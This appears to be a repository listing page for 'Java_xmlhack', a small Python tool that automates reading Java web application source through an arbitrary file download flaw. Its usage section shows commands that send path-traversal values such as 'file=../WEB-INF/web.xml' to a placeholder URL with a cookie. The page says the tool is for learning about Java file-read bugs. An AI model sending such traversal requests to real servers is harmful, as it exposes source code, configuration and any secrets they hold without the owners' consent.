• Stars
    star
    166
  • Rank 226,487 (Top 5 %)
  • Language
    Python
  • Created over 5 years ago
  • Updated over 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

帮助java环境下任意文件下载情况自动化读取源码的小工具

Java_xmlhack

帮助java环境下任意文件下载情况自动化读取源码的小工具

想法

关于Java任意文件读取的学习

使用

git clone https://github.com/Artemis1029/Java_xmlhack.git
cd Java_xmlhack
pip install -r requirements.txt
# if get
python xmlsearch.py -u https://xxx.xxx/?file=../WEB-INF/web.xml -c="cookie"
# if post
python xmlsearch.py -u https://xxx.xxx/ -d="file=../WEB-INF/web.xml" -t="content-type(default application/x-www-form-urlencoded)" -c="cookie"

1

2